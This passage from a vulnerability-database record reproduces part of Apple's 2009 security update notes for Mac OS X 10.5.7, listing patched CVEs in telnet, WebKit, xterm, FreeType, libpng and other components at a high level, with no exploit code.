CVE-2009-0944\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Downloading a maliciously crafted Microsoft Office file may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: Multiple memory corruption issues exist in the Mac OS X Microsoft Office Spotlight Importer. Downloading a maliciously crafted Microsoft Office file may lead to an unexpected application termination or arbitrary code execution. This update addresses the issue by performing additional validation of Microsoft Office files.\r\n\r\n *\r\n\r\n system_cmds\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: The "login" command always runs the default shell with normal priority\r\n\r\n Description: The "login" command starts an interactive shell after a local user is authenticated. The priority level for the interactive shell is reset to the system default, which can cause the shell to run with an unexpectedly high priority. This update addresses the issue by respecting the priority setting of the calling process if the caller is the superuser or the user who was successfully logged in.\r\n\r\n *\r\n\r\n telnet\r\n\r\n CVE-ID: CVE-2009-0158\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Connecting to a TELNET server with a very long canonical name in its DNS address record may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A stack buffer overflow exists in telnet command. Connecting to a TELNET server with a very long canonical name in its DNS address record may lead to an unexpected application termination or arbitrary code execution. This update addresses the issue through improved bounds checking. Credit: Apple.\r\n\r\n *\r\n\r\n WebKit\r\n\r\n CVE-ID: CVE-2009-0945\r\n\r\n Available for: Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Visiting a maliciously crafted website may lead to arbitrary code execution\r\n\r\n Description: A memory corruption issue exists in WebKit's handling of SVGList objects. Visiting a maliciously crafted website may lead to arbitrary code execution. This update addresses the issue through improved bounds checking. For Mac OS X v10.4.11 and Mac OS X Server v10.4.11, updating to Safari 3.2.3 will address this issue. Credit to Nils working with TippingPoint's Zero Day Initiative for reporting this issue.\r\n\r\n *\r\n\r\n X11\r\n\r\n CVE-ID: CVE-2006-0747, CVE-2007-2754\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11\r\n\r\n Impact: Multiple vulnerabilities in FreeType v2.1.4\r\n\r\n Description: Multiple vulnerabilities exist in FreeType v2.1.4, the most serious of which may lead to arbitrary code execution when processing a maliciously crafted font. This update addresses the issues by updating FreeType to version 2.3.8. Further information is available via the FreeType site at http://www.freetype.org/ The issues are already addressed in systems running Mac OS X v10.5.6.\r\n\r\n *\r\n\r\n X11\r\n\r\n CVE-ID: CVE-2008-2383\r\n\r\n Available for: Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Displaying maliciously crafted data within an xterm terminal may lead to arbitrary code execution\r\n\r\n Description: The xterm program supports a command sequence known as DECRQSS that can be used to return information about the current terminal. The information returned is sent as terminal input similar to keyboard input by a user. Within an xterm terminal, displaying maliciously crafted data containing such sequences may result in command injection. This update addresses the issue by performing additional validation of the output data. This issue does not affect systems prior to Mac OS X v10.5.\r\n\r\n *\r\n\r\n X11\r\n\r\n CVE-ID: CVE-2008-1382, CVE-2009-0040\r\n\r\n Available for: Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Multiple vulnerabilities in libpng version 1.2.26\r\n\r\n Description: Multiple vulnerabilities exist in libpng version 1.2.26, the most serious of which may lead to arbitrary code execution. This update addresses the issues by updating libpng to version 1.2.35. Further information is available via the libpng website at http://www.libpng.org/pub/png/libpng.html These issues do not affect systems prior to Mac OS X v10.5.\r\n\r\n *\r\n\r\n X11\r\n\r\n CVE-ID: CVE-2009-0946\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Multiple vulnerabilities in FreeType v2.3.8\r\n\r\n Description: Multiple integer overflows exist in FreeType v2.3.8, which may lead to an unexpected application termination or arbitrary code execution. This update addresses the issues through improved bounds checking. Credit to Tavis Ormandy of the Google Security Team for reporting these issues.\r\n", "edition": 1, "modified": "2009-05-14T00:00:00", "published": "2009-05-14T00:00:00", "id": "SECURITYVULNS:DOC:21825", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:21825", "title": "About the security content of Security Update 2009-002 / Mac OS X v10.5.7", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
